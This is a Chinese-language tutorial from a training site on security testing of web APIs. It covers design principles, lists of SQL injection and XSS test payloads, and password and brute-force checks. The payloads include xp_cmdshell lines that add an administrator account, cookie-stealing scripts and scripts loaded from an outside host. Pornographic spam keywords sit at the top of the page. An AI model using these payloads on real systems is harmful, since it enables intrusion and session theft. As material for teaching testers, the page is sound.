免费可以看的无遮挡av无码|国产在线拍揄自揄视频网站|在线无码精品视频播放在|欧美亚洲国产成人精品,国产成人久久77777精品,亚洲欧美视频在线观看,色偷偷色噜噜狠狠网站久久

千鋒教育-做有情懷、有良心、有品質(zhì)的職業(yè)教育機構

手機站

千鋒學習站 | 隨時隨地免費學

掃一掃進入千鋒手機站

領取全套視頻

關注千鋒學習站小程序
隨時隨地免費學習課程

當前位置：首頁 > 技術干貨 > 基于接口的安全測試你會了嗎

基于接口的安全測試你會了嗎

來源：千鋒教育

發(fā)布人：qyf

時間： 2022-09-02 17:00:46 1662109246

　　一、接口測試安全場景

　　相信大家都曾經(jīng)為黃牛票而憤憤不平吧，但你只能忍氣吞聲，畢竟懂技術的流氓更可怕，像攜程加速、飛豬加速也用過吧，這種流氓更讓人無可奈何。

　　其實了解了接口測試，就不再去“神話“他們“黃牛逼”。

　　無非就是在一定的授權范圍內(nèi)，不斷的批量去請求12306的購票端口，借助自身更大的帶寬和算力去pk我們普通用戶而已，在12306出了候補后，基本就沒啥用了。

　　安全測試說白了就是攻與防的問題，知己知彼才能百戰(zhàn)百勝。

　　二、接口安全設計的原則

　　現(xiàn)在前后段分離式設計，web系統(tǒng)、APP的接口都采用restful架構，restful最重要的一個設計原則就是客戶端與服務端的交互在請求之間是無狀態(tài)的，并采用token的認證方式，以便在多端設備進行鑒權。

　　1、盡量使用更安全的https協(xié)議報文

　　2、接口參數(shù)采用非對稱加密算法進行簽名

　　3、接口參數(shù)需要校驗，如表單提交使用驗證碼進行校驗

　　4、多次失敗后需要有鎖定機制，防止爆破

　　5、接口對應用戶權限，用戶只能調(diào)用有權限的接口

　　6、系統(tǒng)接口做過負荷機制用來保護系統(tǒng)安全

　　7、接口盡量少返回服務錯誤信息給用戶

　　三、接口安全測試

　　1、sql注入

　　Sql注入可以算是最常見的一種攻擊手段了，作為測試人員，一定要熟悉各種sql注入的手段，在測試過程中就封堵這個風險，當然現(xiàn)在的很多開發(fā)框架也具備了防范sql注入的能力。

　　測試中，我們需要設置如下的注入案例：

　　admin'--

　　' or 0=0 --

　　" or 0=0 --

　　or 0=0 --

　　' or 0=0 #

　　" or 0=0 #

　　or 0=0 #

　　' or 'x'='x

　　" or "x"="x

　　') or ('x'='x

　　' or 1=1--

　　" or 1=1--

　　or 1=1--

　　' or a=a--

　　" or "a"="a

　　') or ('a'='a

　　") or ("a"="a

　　hi" or "a"="a

　　hi" or 1=1 --

　　hi' or 1=1 --

　　hi' or 'a'='a

　　hi') or ('a'='a

　　hi") or ("a"="a[/code]

　　'and ( ) exec insert * % chr mid

　　and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49);%20AND%201=2

　　'and 1=1 ; 'And 1=1 ; 'aNd 1=1 ;

　　and 1=2 ; 'and 1=2

　　and 2=2

　　and user>0

　　and (select count(*) from sysobjects)>0

　　and (select count(*) from msysobjects)>0

　　and (Select Count(*) from Admin)>=0

　　and (select top 1 len(username) from Admin)>0(username 已知字段)

　　;exec master..xp_cmdshell "net user name password /add"--

　　;exec master..xp_cmdshell "net localgroup name administrators /add"--

　　and 0<>(select count(*) from admin)

　　2、xss攻擊

　　利用XSS的攻擊者進行攻擊時會向頁面插入惡意Script代碼，當用戶瀏覽該頁面時，嵌入在頁面里的Script代碼會被執(zhí)行，從而達到攻擊用戶的目的。同樣會造成用戶的認證信息被獲取，仿冒用戶登錄，造成用戶信息泄露等危害。

　　測試中，我們需要設置如下的xss攻擊案例：

><scrīpt>alert(document.cookie)</scrīpt>

='><scrīpt>alert(document.cookie)</scrīpt>

<scrīpt>alert(document.cookie)</scrīpt>

<scrīpt>alert(helloworld)</scrīpt>

%3Cscrīpt%3Ealert('XSS')%3C/scrīpt%3E

<scrīpt>alert('XSS')</scrīpt>

<scrīpt>alert('linda is ok');</scrīpt>

<scrīpt>alert('Vulnerable')</scrīpt>

?sql_debug=1

a%5c.aspx

a.jsp/<scrīpt>alert('Vulnerable')</scrīpt>

a?<scrīpt>alert('Vulnerable')</scrīpt>

"><scrīpt>alert('Vulnerable')</scrīpt>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E

%3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E&

%3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

"<IMG SRC=java\0scrīpt:alert(\"XSS\")>";' > out

<scrīpt>a=/XSS/alert(a.source)</scrīpt>

SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

<scrīpt a=">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt =">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt a=">" '' SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt "a='>'" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt>document.write("<SCRI");</scrīpt>PT SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

　　3、用戶賬號及暴力攻擊

　　用戶賬號信息是訪問系統(tǒng)獲取服務的最關鍵的一環(huán)，如果泄露了信息就沒有任何安全可言，通過利用賬戶登錄接口大量猜測和窮舉的方式來嘗試獲取用戶口令。就是猜口令咯，攻擊者一直枚舉進行請求，通過對比數(shù)據(jù)包的長度可以很好的判斷是否爆破成功，因為爆破成功和失敗的長度是不一樣的，所以可以很好的判斷是否爆破成功。

　　作為測試人員，需要對賬戶信息進行如下測試：

　　檢測接口程序連接登錄時，是否需要輸入相應的用戶

　　是否設置密碼最小長度

　　用戶名和密碼中是否可以有空格或回車?

　　是否允許密碼和用戶名一致

　　防惡意注冊：可否用自動填表工具自動注冊用戶?

　　遺忘密碼處理是否有校驗碼?

　　密碼錯誤次數(shù)有無限制?

　　大小寫敏感?

　　口令不允許以明碼顯示在輸出設備上

　　強制修改的時間間隔限制(初始默認密碼)

　　口令的唯一性限制(看需求是否需要)